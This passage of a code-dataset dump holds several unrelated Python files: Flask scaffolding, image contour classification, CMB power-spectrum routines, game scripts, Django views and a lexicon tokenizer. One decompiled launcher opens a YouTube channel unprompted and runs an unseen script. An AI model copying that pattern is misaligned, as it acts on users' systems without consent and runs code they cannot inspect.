            script_dg.write('# Inspired by Miguel Grinberg\'s Flask Mega Tutorial.\n')
            script_dg.write('# Check it out at https://blog.miguelgrinberg.com/post/the-flask-mega-tutorial-part-i-hello-world')
            script_dg.write('\n\n')
            script_dg.write('from migrate.versioning import api\n')
            script_dg.write('from config import SQLALCHEMY_DATABASE_URI\n')
            script_dg.write('from config import SQLALCHEMY_MIGRATE_REPO\n')
            script_dg.write('\n')
            script_dg.write('v = api.db_version(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)\n')
            script_dg.write('api.downgrade(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO, v - 1)\n')
            script_dg.write('v = api.db_version(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)\n')
            script_dg.write('\n')
            script_dg.write("print('Current database version: {}'.format(v))\n")
        with open(os.path.join(self.path_for_root, 'db_upgrade.py'), 'w') as script_ug:
            script_ug.write('# Inspired by Miguel Grinberg\'s Flask Mega Tutorial.\n')
            script_ug.write('# Check it out at https://blog.miguelgrinberg.com/post/the-flask-mega-tutorial-part-i-hello-world')
            script_ug.write('\n\n')
            script_ug.write('from migrate.versioning import api\n')
            script_ug.write('from config import SQLALCHEMY_DATABASE_URI\n')
            script_ug.write('from config import SQLALCHEMY_MIGRATE_REPO\n')
            script_ug.write('\n')
            script_ug.write('api.upgrade(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)\n')
            script_ug.write('v = api.db_version(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)\n')
            script_ug.write('\n')
            script_ug.write("print('Current database version: {}'.format(v))\n")

    def finalizeApp(self):
        """Write app/__init__.py, importing the feature modules that were
        enabled earlier. Must be called after any add*Support calls."""
        imp_l = ['views']
        # Set the initialization script
        with open(os.path.join(self.path_for_app, '__init__.py'), 'w') as init_script:
            init_script.write('import os\n')
            init_script.write('from flask import Flask\n')
            if self.sp_database:
                imp_l.append('models')
                init_script.write('from flask_sqlalchemy import SQLAlchemy\n')
                init_script.write('from config import basedir\n')
            init_script.write('\n')
            init_script.write('app = Flask(__name__)\n')
            init_script.write("app.config.from_object('config')\n")
            if self.sp_database:
                init_script.write('db = SQLAlchemy(app)\n')
            init_script.write('\n')
            init_script.write('from app import {}\n'.format(', '.join(imp_l)))
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description = 'Create Flask application arborescence')
    parser.add_argument('name', type = str,
                        help = 'The name of the application; will set the name of the root directory.')
    args = parser.parse_args()
    # wtforms names imported into the generated forms.py
    FORM_FIELDS = ['StringField', 'TextAreaField']
    FORM_VALIDATORS = ['DataRequired', 'Length']
    builder = AppBuilder(args.name)
    # Add support for various features here
    builder.addFormSupport(FORM_FIELDS, FORM_VALIDATORS)
    builder.addDatabaseSupport()
    # Do not edit below this point
    builder.finalizeApp()
15,981 | 48c1e36918fe14e63fc2fe40169fc4fafdcb3709 | version https://git-lfs.github.com/spec/v1
oid sha256:f1ff30b52cb24bb73fb81207bf41852644551b23338fddd7b4f11e3f62dd4aaa
size 4518
|
15,982 | d05842be515ca5bbddbc4d1b263cde3e66cb7269 | """
Holds all classification functions
"""
#cv and math imports
import numpy as np
from matplotlib import pyplot as plt
import cv2
from math import radians, cos, sin, asin, sqrt,atan,atan2,degrees
#metadata, locations
import PIL.ExifTags
import PIL.Image
import utm #latqlong to utm-wgs84 transformations
#general libs
import pickle
import time
import os
import re
import sys
from pathlib import Path
#programs imports
import in_out as io
import constants as const
import utilmod as util
# def check_size (cont):
# return cont
# def check_shape (cont):
def kill_small_conts(contours,hierarchy,pxl_size):
    """
    Deletes all contours smaller than a given size
    Args:
        contours: contours list
        hierarchy: contours hierarchy list in opencv format
        pxl_size: pixel size of the image
    Returns:
        tuple of (the big enough) contoures and matched hierarchy

    NOTE(review): the hierarchy append below is commented out, so the
    second element of the returned tuple is ALWAYS an empty list --
    callers must not rely on it actually being the matched hierarchy.
    """
    conts = []
    hier = []
    # Minimum area threshold converted from world units to pixels.
    min_pxl_area = const.MIN_LEAF_AREA/pxl_size**2
    for i,c in enumerate(contours):
        if (cv2.contourArea(c) > min_pxl_area):
            conts.append(c)
            # hier.append(hierarchy[i])
    return (conts,hier)
def kill_nested_in_big (contours,hierarchy,max_size = 120000):
    """
    Deletes all contours that are big enough and their descendants.
    Used to delete artificial contours.
    Args:
        contours: contours list
        hierarchy: contours hierarchy list in opencv format
        max_size: in pixels
    Returns:
        tuple of (the big enough) contoures and matched hierarchy,
        and artificial contours
    """
    ts = time.time()  # NOTE(review): leftover timing probe; result unused
    del_indexes = []
    conts = []
    hier = []
    art_conts = []
    # find all sons
    for i,c in enumerate(contours):
        if((cv2.contourArea(c) > max_size)):
            # and util.solidity (c) > const.MIN_ARTIFICIAL_SOLIDITY ):
            art_conts.append(c)
            # print ('tree list of {} '.format(i),hierarchy[i])
            # NOTE(review): `conts` is still empty at this point -- this
            # call probably should receive `contours` instead; confirm
            # against util.tree_list before changing.
            sons = util.tree_list(conts,hierarchy,i)
            del_indexes.extend(sons)
    # delete the sons
    red_conts = [c for i, c in enumerate(contours) if i not in del_indexes]
    red_hier = [h for i, h in enumerate(hierarchy) if i not in del_indexes]
    te = time.time()  # NOTE(review): unused timing probe
    return (red_conts,red_hier,art_conts)
# def classify_conts (image,conts,hierarchy):
# c,h = kill_big_and_nested (contours,hierarchy)
# c,h = kill_small_conts (c,h)
##
# return c,h
def bare_soil(sil):
    """Return True when the silhouette's colour stats look like bare soil.

    The contour is treated as non-soil (returns False) only when it is
    both dark (mean L below 160) and colour-varied (a-channel std above 3).
    Calls sil.get_color_params() first to populate those statistics.
    """
    sil.get_color_params()
    dark_and_varied = sil.l_mean < 160 and sil.a_std > 3
    return not dark_and_varied
def bare_soil_cont (c,im):
    """Return True when the pixels inside contour *c* of BGR image *im*
    look like bare soil.

    Same thresholds as bare_soil(): only a region that is both dark
    (mean L < 160) and colour-varied (a-channel std > 3) returns False.
    """
    # Work on a cropped "stamp" around the contour's bounding box.
    x,y,w,h = cv2.boundingRect(c)
    stamp = np.copy (im [y:y+h,x:x+w])
    lab_stamp = cv2.cvtColor(stamp, cv2.COLOR_BGR2Lab)
    l_channel = lab_stamp[:,:,0]
    a_channel = lab_stamp[:,:,1]
    # Shift the contour into the stamp's local coordinates.
    c = c - (x,y)
    mask = np.zeros((h,w))
    cv2.drawContours(mask,[c],0,255,-1)
    # plt.imshow(mask),plt.show()
    # Collect the L and a values of pixels inside the filled contour.
    pts = np.where(mask == 255)
    l_lst = l_channel[pts[0],pts[1]]
    a_lst = a_channel[pts[0],pts[1]]
    if ((np.mean(l_lst) < 160) and (np.std(a_lst) > 3)):
        return False
    else:
        return True
def main_classifier(image, conts, hierarchy, pxl_size=-1):
    """
    Classify all conts in an image, to artificial/bare-soil/targets
    Args:
        image: image object
        conts: raw list of contours, as recived after filtering
        hierarchy: hierarchy list in opencv format
        pxl_size: pxl size of the image
    Returns:
        tuple holding the lists of the artificial/bare-soil/targets contours
    """
    # Dead timing probes (ts0/t1/t2/te0/ts/te) and the unused del_indexes
    # list from the original implementation have been removed; the
    # classification logic itself is unchanged.
    bare_soil_conts = []
    target_conts = []
    im = image
    # Largest plausible real-object area, converted from world units to pixels.
    artificial_pxl_size = const.MAX_ARTIFICIAL_TRUE_SIZE / (pxl_size**2)
    # First drop artificial contours (and their descendants), then the
    # contours that are too small to be leaves.
    conts, hierarchy, art_conts = kill_nested_in_big(conts, hierarchy, artificial_pxl_size)
    conts, hierarchy = kill_small_conts(conts, hierarchy, pxl_size)
    # Split the survivors into bare soil vs. actual targets.
    for c in conts:
        if bare_soil_cont(c, im):
            bare_soil_conts.append(c)
        else:
            target_conts.append(c)
    return (art_conts, bare_soil_conts, target_conts)
|
15,983 | e4bf9bf609a4d78034441e53d9d7563d46952b79 |
import glob
import cv2
import os
path_relative = os.getcwd()
def processar(path_in, separator, path_out, res, ton):
    """Read an image, resize it to res x res, and write it under path_out.

    Args:
        path_in: source image path
        separator: substring after which the file name starts in path_in
        path_out: destination directory (must end with a path separator)
        res: target width and height in pixels
        ton: colour mode -- 'rgb' reads in colour, 'cinza' reads greyscale;
             any other value is silently ignored (matches the original
             behaviour of the two independent if-branches).
    """
    if ton == 'rgb':
        flags = cv2.IMREAD_COLOR      # same as cv2.imread(path) default
    elif ton == 'cinza':
        flags = cv2.IMREAD_GRAYSCALE  # same as cv2.imread(path, 0)
    else:
        return
    img = cv2.imread(path_in, flags)       # read
    img = cv2.resize(img, (res, res))      # resize
    nome_img = path_in.split(separator)[1]
    cv2.imwrite(path_out + nome_img, img)  # save
def split_imagens(path, path_mask, separator, separator_mask):
    """Resize every retina image and mask into the 400px/800px variants.

    Args:
        path: glob pattern for the source images
        path_mask: glob pattern for the source masks
        separator: substring processar() uses to extract the file name
        separator_mask: same, for mask paths
    """
    print('processando mask')
    lista_images = glob.glob(path)
    # images: each source image is written greyscale and RGB at both sizes
    for i in lista_images:
        print('IMAGES -> processando image > ', i)
        processar(i, separator, path_relative + '/data/imagens/retina/400/cinza/', 400, 'cinza')
        processar(i, separator, path_relative + '/data/imagens/retina/400/rgb/', 400, 'rgb')
        processar(i, separator, path_relative + '/data/imagens/retina/800/cinza/', 800, 'cinza')
        processar(i, separator, path_relative + '/data/imagens/retina/800/rgb/', 800, 'rgb')
    # mask: masks are greyscale only
    lista_mask = glob.glob(path_mask)
    for i in lista_mask:
        print('MASK -> processando image > ', i)
        processar(i, separator_mask, path_relative + '/data/imagens/mask/400/', 400, 'cinza')
        processar(i, separator_mask, path_relative + '/data/imagens/mask/800/', 800, 'cinza')
def pre_process_image(path):
    """Sort RIM-ONE source files into image/ and mask/ as PNGs.

    Args:
        path: despite the name, a LIST of file paths (typically the result
              of glob.glob over the /src/ directory). Files whose name
              contains '-' are masks; everything else is a plain image.
    """
    list_images = path
    print("total = ", len(list_images))
    for i in list_images:
        name = i.split('/src/')[1]
        if '-' in name:
            """save in /mask/"""
            name_mask = name.split('-')[0]
            name_mask = name_mask + str('_mask.png')
            cv2.imwrite(path_relative + '/data/imagens/RIM-ONE/mask/' + name_mask, cv2.imread(i))
            print('processada imagem ', name_mask)
        else:
            """save in /image/"""
            name_image = name.split('.')[0]
            name_image = name_image + str('.png')
            cv2.imwrite(path_relative + '/data/imagens/RIM-ONE/image/' + name_image, cv2.imread(i))
            print('processada imagem ', name_image)
if __name__ == '__main__':
    #pre_process_image(glob.glob(path_relative + '/data/imagens/RIM-ONE/src/*.bmp'))
    # NOTE(review): hard-coded absolute paths -- only valid on the original
    # author's machine; parameterize before reuse.
    split_imagens(path='/home/nig/PycharmProjects/Segmentation/data/imagens/RIM-ONE/image/*.png',
                  path_mask='/home/nig/PycharmProjects/Segmentation/data/imagens/RIM-ONE/mask/*.png',
                  separator='/image/',
                  separator_mask='/mask/')
15,984 | 2ad23f5d24ea8582fd9c34880e3e32be8df1a6a9 | """
Routines for power spectra estimation and debiasing.
"""
import healpy as hp, numpy as np
from pspy import pspy_utils,so_mcm
from pixell import curvedsky
def get_spectra(alm1, alm2=None, spectra=None):
    """Get the power spectrum of alm1 and alm2, we use healpy.alm2cl for doing this.
    for the spin0 and spin2 case it is a bit ugly as we have to deal with healpix convention.
    Our convention for spectra is: ['TT','TE','TB','ET','BT','EE','EB','BE','BB']
    while healpix convention is to take alm1,alm2 and return ['TT','EE','BB','TE','EB','TB']
    Parameters
    ----------
    alm1: 1d array
      the spherical harmonic transform of map1
    alm2: 1d array
      the spherical harmonic transform of map2
    spectra: list of strings
      needed for spin0 and spin2 cross correlation, the arrangement of the spectra
    Return
    ----------
    The function returns the multipole array l and cl a 1d power spectrum array or
    cl_dict (for spin0 and spin2) a dictionnary of cl with entry spectra
    """
    if spectra is None:
        # Spin-0 only: a single spectrum (auto when alm2 is None).
        if alm2 is None:
            cls = hp.sphtfunc.alm2cl(alm1)
        else:
            cls = hp.sphtfunc.alm2cl(alm1, alm2)
        l = np.arange(len(cls))
        return l, cls
    # healpy's alm2cl treats a None second argument as auto-spectra.
    cls = hp.sphtfunc.alm2cl(alm1, alm2)
    l = np.arange(len(cls[0]))
    """ spectra_healpix=[TT,EE,BB,TE,EB,TB] """
    # Map healpix ordering into our 9-entry convention (indices into `spectra`).
    spectra_healpix = [spectra[0], spectra[5], spectra[8], spectra[1], spectra[6], spectra[2]]
    cl_dict = {spec: cls[i] for i, spec in enumerate(spectra_healpix)}
    if alm2 is None:
        #here we set ET=TE, BE=EB and BT=TB
        cl_dict[spectra[3]] = cl_dict[spectra[1]]
        cl_dict[spectra[7]] = cl_dict[spectra[6]]
        cl_dict[spectra[4]] = cl_dict[spectra[2]]
    else:
        #here we need to recompute cls inverting the order of the alm to get ET,BT and BE
        cls = hp.sphtfunc.alm2cl(alm2, alm1)
        # spectra_healpix=[TT,EE,BB,ET,BE,BT]
        spectra_healpix = [spectra[0], spectra[5], spectra[8], spectra[3], spectra[7], spectra[4]]
        for i, spec in enumerate(spectra_healpix):
            cl_dict[spec] = cls[i]
    return l, cl_dict
def get_spectra_pixell(alm1, alm2=None, spectra=None):
    """Get the power spectrum of alm1 and alm2, we use pixell.alm2cl (this is faster)
    Parameters
    ----------
    alm1: 1d array
      the spherical harmonic transform of map1
    alm2: 1d array
      the spherical harmonic transform of map2
    spectra: list of strings
      needed for spin0 and spin2 cross correlation, the arrangement of the spectra
    Return
    ----------
    The function returns the multipole array l and cl a 1d power spectrum array or
    cl_dict (for spin0 and spin2) a dictionnary of cl with entry spectra
    """
    if spectra is None:
        if alm2 is None:
            cls = curvedsky.alm2cl(alm1)
        else:
            cls = curvedsky.alm2cl(alm1, alm2)
        l = np.arange(len(cls))
        return l, cls
    # Bug fix: the spin0+spin2 branch used to index alm2[None, :] even when
    # alm2 was None (auto-spectra), raising a TypeError. Use alm1 for both
    # sides in that case, giving the auto cross-component spectra.
    if alm2 is None:
        alm2 = alm1
    cls = curvedsky.alm2cl(alm1[:, None], alm2[None, :])
    l = np.arange(len(cls[0, 0]))
    # Build the 9-entry TT/TE/.../BB dictionary from the 3x3 block.
    cl_dict = {}
    for i, l1 in enumerate(["T", "E", "B"]):
        for j, l2 in enumerate(["T", "E", "B"]):
            cl_dict[l1 + l2] = cls[i, j]
    return (l, cl_dict)
def deconvolve_mode_coupling_matrix(l, ps, inv_mode_coupling_matrix, spectra=None):
    """deconvolve the mode coupling matrix

    Parameters
    ----------
    l: 1d array
      the multipoles or the location of the center of the bins
    ps: 1d array or dict of 1d array
      the power spectra, a 1d array (spin0) or a dictionnary (spin0 and spin2);
      the dictionary is modified in place and also returned
    inv_mode_coupling_matrix: 2d array (or dict of 2d arrays)
      the inverse of the mode coupling matrix, binned or not; the dict form
      holds the 'spin0xspin0', 'spin0xspin2', 'spin2xspin0' and
      'spin2xspin2' blocks
    spectra: list of string
      needed for spin0 and spin2 cross correlation, the arrangement of the spectra
    """
    block_len = len(l)
    # Pure spin-0 case: a single matrix-vector product.
    if spectra is None:
        return l, np.dot(inv_mode_coupling_matrix, ps)
    ps["TT"] = inv_mode_coupling_matrix["spin0xspin0"] @ ps["TT"]
    for name in ("TE", "TB"):
        ps[name] = inv_mode_coupling_matrix["spin0xspin2"] @ ps[name]
    for name in ("ET", "BT"):
        ps[name] = inv_mode_coupling_matrix["spin2xspin0"] @ ps[name]
    # The four spin2xspin2 spectra are coupled: stack them into one vector,
    # apply the 4x4-block inverse, then slice the result back out.
    stacked = np.concatenate([np.asarray(ps[name]) for name in ("EE", "EB", "BE", "BB")])
    stacked = inv_mode_coupling_matrix["spin2xspin2"] @ stacked
    for i, name in enumerate(("EE", "EB", "BE", "BB")):
        ps[name] = stacked[i * block_len:(i + 1) * block_len]
    return l, ps
def bin_spectra(l, cl, binning_file, lmax, type, spectra=None, mbb_inv=None, binned_mcm=True):
    """Bin the power spectra according to a binning file and optionally
    deconvolve the (binned) mode coupling matrix.

    Parameters
    ----------
    l: 1d array
        the multipoles (unused as such: the function rebuilds l = 2..lmax-1)
    cl: 1d array or dict of 1d array
        the power spectra to bin; a 1d array (spin0) or a dictionary
        (spin0 and spin2), indexed by multipole starting at l = 0
    binning_file: data file
        a binning file with format bin low, bin high, bin mean
    lmax: int
        the maximum multipole to consider
    type: string
        the type of binning, either bin Cl or bin Dl
    spectra: list of string
        needed for spin0 and spin2 cross correlation, the arrangement of the spectra
    mbb_inv: 2d array
        optionally apply the inverse of the mode coupling matrix to debias the spectra
    binned_mcm: boolean
        if mbb_inv is not None, specify whether it is binned or not

    Return
    ----------
    The function returns the binned multipole array bin_c and a 1d power spectrum
    array (or dictionary of 1d power spectra if spectra is not None).
    """
    bin_lo, bin_hi, lb, bin_size = pspy_utils.read_binning_file(binning_file, lmax)
    n_bins = len(bin_hi)
    # the alm2cl return cl starting at l = 0, we use spectra from l = 2
    # this is due in particular to the fact that the mcm is computed only for l>=2
    l = np.arange(2, lmax)
    if spectra is None: cl = cl[l]
    else: cl = {f: cl[f][l] for f in spectra}
    # Dl = l(l+1)/(2 pi) Cl; for "Cl" the weighting factor is all ones
    if type == "Dl": fac = (l * (l + 1) / (2 * np.pi))
    elif type == "Cl": fac = l * 0 + 1
    # we have the option to deconvolve the l-by-l mode coupling matrix
    # (must happen BEFORE binning in that case)
    if (mbb_inv is not None) & (binned_mcm == False):
        l, cl = deconvolve_mode_coupling_matrix(l, cl, mbb_inv, spectra)
    # Now the binning part: each bin is the plain mean of fac*cl over the
    # multipoles falling inside [bin_lo, bin_hi]
    if spectra is None:
        ps = np.zeros(n_bins)
        for ibin in range(n_bins):
            loc = np.where((l >= bin_lo[ibin]) & (l <= bin_hi[ibin]))
            ps[ibin] = (cl[loc] * fac[loc]).mean()
    else:
        # concatenate the binned spectra in the `spectra` order, then
        # repack them into a dictionary
        vec = []
        for f in spectra:
            binned_power = np.zeros(n_bins)
            for ibin in range(n_bins):
                loc = np.where((l >= bin_lo[ibin]) & (l <= bin_hi[ibin]))
                binned_power[ibin] = (cl[f][loc] * fac[loc]).mean()
            vec = np.append(vec, binned_power)
        ps = vec2spec_dict(n_bins, vec, spectra)
    # we have the option to deconvolve the binned mode coupling matrix
    # (must happen AFTER binning in that case)
    if (mbb_inv is not None) & (binned_mcm == True):
        lb, ps = deconvolve_mode_coupling_matrix(lb, ps, mbb_inv, spectra)
    return lb, ps
def vec2spec_dict(n_bins, vec, spectra):
    """Take a vector of concatenated power spectra and return a dictionary.

    vec is expected in the order given by `spectra`, for example
    [cl_TT, cl_TE, cl_ET, ..., cl_BB].

    Parameters
    ----------
    n_bins: int
        the number of bins per spectrum
    vec: 1d array
        the concatenated spectra
    spectra: list of strings
        the arrangement of the spectra, for example:
        ['TT','TE','TB','ET','BT','EE','EB','BE','BB']
    """
    out = {}
    for idx, name in enumerate(spectra):
        start = idx * n_bins
        out[name] = vec[start:start + n_bins]
    return out
def write_ps(file_name, l, ps, type, spectra=None):
    """Write down the power spectra to disk as whitespace-separated columns.

    Parameters
    ----------
    file_name: str
        the name of the file to write the spectra
    l: 1d array
        the multipoles (or binned multipoles), written as the first column
    ps: 1d array or dict of 1d array
        the power spectrum; if spectra is not None, a dictionary with
        one entry per element of spectra
    type: string
        'Cl' or 'Dl', only used to label the header
    spectra: list of strings
        needed for spin0 and spin2 cross correlation, the arrangement
        of the spectra
    """
    # the two original branches differed only in the columns and the header
    # label; they also shadowed the builtin `str` for the header string
    if spectra is None:
        columns = [ps]
        header = "l %s" % type
    else:
        columns = [ps[f] for f in spectra]
        header = "l" + "".join(" %s_%s" % (type, f) for f in spectra)
    columns[0:0] = [l]
    np.savetxt(file_name, np.transpose(np.array(columns)), header=header)
def read_ps(file_name, spectra=None):
    """Read power spectra from a column text file.

    Parameters
    ----------
    file_name: str
        the name of the file to read the spectra from
    spectra: list of strings
        needed for spin0 and spin2 cross correlation, the arrangement
        of the spectra

    Return
    ----------
    The multipoles (first column) and either a 1d power spectrum array
    (second column) or a dictionary of columns keyed by `spectra`.
    """
    data = np.loadtxt(file_name)
    multipoles = data[:, 0]
    if spectra is None:
        return multipoles, data[:, 1]
    return multipoles, {name: data[:, col] for col, name in enumerate(spectra, start=1)}
def write_ps_hdf5(file, spec_name, l, ps, spectra=None):
    """Write down the power spectra in a hdf5 file.

    Parameters
    ----------
    file: hdf5
        the open hdf5 file handle
    spec_name: string
        the name of the group to create in the hdf5 file
    l: 1d array
        the multipoles (or binned multipoles)
    ps: 1d array or dict of 1d array
        the power spectrum; if spectra is not None, a dictionary with
        one entry per element of spectra

    The dataset is stored row-wise: [l, spec0, spec1, ...], which is why
    read_ps_hdf5 transposes it back.
    """
    # the single-use inner closure was flattened and the `== None`
    # comparison replaced by the identity test
    columns = [l]
    if spectra is None:
        columns.append(ps)
    else:
        columns.extend(ps[spec] for spec in spectra)
    group = file.create_group(spec_name)
    group.create_dataset(name="data", data=columns, dtype="float")
def read_ps_hdf5(file, spec_name, spectra=None):
    """Read the power spectra from a hdf5 file.

    Parameters
    ----------
    file: hdf5
        the open hdf5 file handle
    spec_name: string
        the name of the group in the hdf5 file
    spectra: list of strings
        needed for spin0 and spin2 cross correlation, the arrangement
        of the spectra

    Return
    ----------
    The multipoles (first stored row) and either a 1d power spectrum
    array or a dictionary of power spectra keyed by `spectra`.
    """
    # data was stored row-wise [l, spec0, ...]; transpose back to columns
    data = np.array(file[spec_name]["data"]).T
    multipoles = data[:, 0]
    if spectra is None:
        return multipoles, data[:, 1]
    return multipoles, {name: data[:, col] for col, name in enumerate(spectra, start=1)}
|
15,985 | 3d9378040ae604c475184908326dd2ef91c6837c | # If the peasant is damaged, the flowers will shrink!
def summonSoldiers():
    """Summon one soldier whenever the hero can afford it (CodeCombat API)."""
    if hero.gold >= hero.costOf("soldier"):
        hero.summon("soldier")
# Define the function: commandSoldiers
def commandSoldiers():
    """Order every friendly soldier to attack its nearest enemy."""
    for friend in hero.findFriends():
        enemy = friend.findNearestEnemy()
        # non-soldier friends (e.g. the peasant) are deliberately not commanded
        if enemy and friend.type == "soldier":
            hero.command(friend, "attack", enemy)
# Helper for pickUpCoin: choose the most worthwhile item to fetch.
def findBestItem(items):
    """Return the item with the highest value-per-distance score, or None.

    The score was computed twice per item in the original; it is now
    computed once per item.
    """
    bestItem = None
    bestValue = 0
    for item in items:
        # NOTE(review): assumes hero.distanceTo(item) > 0 -- an item exactly
        # at the hero's position would divide by zero, as in the original.
        score = item.value / hero.distanceTo(item)
        if score > bestValue:
            bestItem = item
            bestValue = score
    return bestItem
def pickUpCoin():
    """Move toward the best-scoring ground item, if there is one."""
    items = hero.findItems()
    # despite the name this is the best value/distance item, not the nearest
    nearestCoin = findBestItem(items)
    if nearestCoin:
        hero.move(nearestCoin.pos)
# NOTE(review): `peasant` is fetched but never used below -- presumably kept
# for a level objective; confirm before removing.
peasant = hero.findByType("peasant")[0]
# Main game loop: keep summoning, commanding and collecting forever.
while True:
    summonSoldiers()
    commandSoldiers()
    pickUpCoin()
|
15,986 | 96ddc8d8b74ea03738a3f7355bc8b0b096a9472e | import fractions
from algebra import cancel
from integer import digitsToNumber
# Search for "digit-cancelling" fractions: two-digit fractions i/j (i < j)
# whose value is unchanged by naively cancelling a shared digit
# (e.g. 49/98 = 4/8).  `cancel` and `digitsToNumber` come from the local
# algebra/integer modules -- presumably cancel() removes one common digit
# from each operand's digit list; confirm against those modules.
for i in range(10, 99):
    for j in range(i + 1, 100):
        # skip multiples of 10: cancelling their trailing zeros is trivial
        if i % 10 and j % 10:
            f = cancel(list(str(i)), list(str(j)))
            f0 = digitsToNumber(f[0])
            f1 = digitsToNumber(f[1])
            # only a single non-zero digit left on each side counts as a
            # genuine cancellation
            if 0 < f0 < 10 and 0 < f1 < 10:
                if fractions.Fraction(f0, f1) == fractions.Fraction(i, j):
                    print(i, j)
15,987 | e24b50cdb48c29e24a3e387efcf4f5650677e2d8 | # uncompyle6 version 3.7.3
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.16 (default, Oct 10 2019, 22:02:15)
# [GCC 8.3.0]
# Embedded file name: o.py
# Compiled at: 2020-08-22 12:50:28
import os, sys, time
from time import sleep
os.system('clear')
os.system('xdg-open https://m.youtube.com/channel/UCSqjFOkS5_2bEP9WW24pnLA')
sleep(5)
print '\x1b[1;37m\xe2\x97\x80\x1b[1;36m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\x1b[1;37m\xe2\x96\xb6'
print '\x1b[1;37m[\x1b[1;32m1\x1b[1;37m]\x1b[1;33mLogin SC'
print '\x1b[1;37m[\x1b[1;32m2\x1b[1;37m]\x1b[1;33minstall bahan dulu'
print '\x1b[1;37m[\x1b[1;32m0\x1b[1;37m]\x1b[1;31mexit'
pil = raw_input('\x1b[1;33mPilih > \x1b[1;32m')
if pil == '1':
os.chdir('X')
os.system('python2 a.py')
elif pil == '2':
os.system('clear')
print '\x1b[1;33mInstalling...'
sleep(2)
os.system('pkg install figlet ruby -y')
os.system('gem install lolcat')
os.system('clear')
print '\x1b[1;32mBahan Terinstall'
fil = raw_input('\x1b[1;33mTekan Enter untuk login sc : ')
if fil == '':
os.chdir('X')
os.system('python2 a.py')
elif pil == '0':
sys.exit()
# okay decompiling run.pyc
|
num1 = 3
num2 = 4
num3 = 5
# Bug fix: the original if/elif chain used strict '>' comparisons, so when
# two values tied for largest (e.g. 5, 5, 3) both branches failed and the
# smallest value was reported.  max() handles ties correctly.
largest = max(num1, num2, num3)
print("", largest)
|
15,989 | 06dae6f0c45d56086378e9db047603ede9ca20b7 | from django.shortcuts import redirect, render
from .models import Versao
def home(request):
    """Render the 'about' page as the site landing view."""
    nome = 'sobre'  # active-menu marker consumed by the template
    return render(request, 'logicgirl/sobre.html', {'nome': nome})
def sugestao(request):
    """Render the suggestion/feedback page."""
    nome = 'avaliacao'  # active-menu marker consumed by the template
    return render(request, 'logicgirl/sugestao.html', {'nome': nome})
def reverter(lista):
    """Return a new list with the elements of *lista* in reverse order.

    Accepts any iterable (including a Django QuerySet, as used by
    downloads()).  The original built the result with insert(0, ...),
    which is O(n^2); materialize once and reverse in place instead.
    """
    itens = list(lista)
    itens.reverse()
    return itens
def downloads(request):
    """Render the downloads page listing all versions, newest first."""
    nome = 'downloads'  # active-menu marker consumed by the template
    # reverter() flips the queryset so the most recent version is shown first
    versoes = reverter(Versao.objects.all())
    return render(request, 'logicgirl/downloads.html', {'nome': nome, 'versoes': versoes})
def equipe(request):
    """Render the team page."""
    nome = 'equipe'  # active-menu marker consumed by the template
    return render(request, 'logicgirl/equipe.html', {'nome': nome})
def sobre(request):
    """Legacy alias for the landing page: delegate to home() via redirect."""
    return redirect('home')
def baixar(request, id):
    """Count one download of version *id* and redirect to its file.

    Redirects back to the downloads page when the id does not exist.
    """
    # .first() fetches the row once, instead of the original
    # filter-then-get double query; it also avoids shadowing the view's
    # own name with a local variable
    versao = Versao.objects.filter(pk=id).first()
    if versao is None:
        return redirect("downloads")
    versao.qtd_down += 1
    versao.save()
    return redirect(versao.arq)
class lexicon(object):
    """Tokenizer that classifies each word of a sentence as a direction,
    verb, stop word, noun or number, producing (type, value) tuples.
    Unknown tokens become ('error', word)."""

    def __init__(self):
        # result of the most recent scan() call
        self.words = []

    def __isDirection__(self, word):
        """
        Check if the given word is a direction.
        :param word: lowercased token
        :returns (('direction', word), True) on a match, else (None, False)
        """
        self.directions = ('north', 'south', 'east', 'west', 'down', 'up', 'left', 'right', 'back')
        if word in self.directions:
            return ('direction', word), True
        return None, False

    def __isVerb__(self, word):
        """
        Check if the given word is a verb.
        :param word: lowercased token
        :returns (('verb', word), True) on a match, else (None, False)
        """
        self.verbs = ('go', 'stop', 'kill', 'eat')
        if word in self.verbs:
            return ('verb', word), True
        return None, False

    def __isStopWord__(self, word):
        """
        Check if the given word is a stop word.
        :param word: lowercased token
        :returns (('stop', word), True) on a match, else (None, False)
        """
        self.stopWords = ('the', 'in', 'of', 'from', 'at', 'it')
        if word in self.stopWords:
            return ('stop', word), True
        return None, False

    def __isNoun__(self, word):
        """
        Check if the given word is a noun.
        :param word: lowercased token
        :returns (('noun', word), True) on a match, else (None, False)
        """
        self.nouns = ('door', 'bear', 'princess', 'cabinet')
        if word in self.nouns:
            return ('noun', word), True
        return None, False

    def __isNumber__(self, word):
        """
        Check if the given word parses as an integer.
        :param word: token
        :returns (('number', int(word)), True) on success, else (None, False)
        """
        try:
            return ('number', int(word)), True
        except ValueError:
            return None, False

    def __check_word__(self, word):
        """
        Classify one token, trying direction, verb, stop word, noun and
        number in that order; anything else maps to ('error', word) with
        the original (non-lowercased) word.
        :param word: raw token
        :return: (type, value) tuple
        """
        self.directionValue, self.isDirection = self.__isDirection__(word.lower())
        self.verbValue, self.isVerb = self.__isVerb__(word.lower())
        self.stopValue, self.isStop = self.__isStopWord__(word.lower())
        self.nounValue, self.isNoun = self.__isNoun__(word.lower())
        self.numberValue, self.isNumber = self.__isNumber__(word.lower())
        if self.isDirection:
            return self.directionValue
        elif self.isVerb:
            return self.verbValue
        elif self.isStop:
            return self.stopValue
        elif self.isNoun:
            return self.nounValue
        elif self.isNumber:
            return self.numberValue
        else:
            return ('error', word)

    def scan(self, message):
        """
        Split the given message on single spaces and classify every token.

        Bug fix: self.words is now reset on each call; previously repeated
        scans on the same instance kept appending, so results accumulated
        across calls.
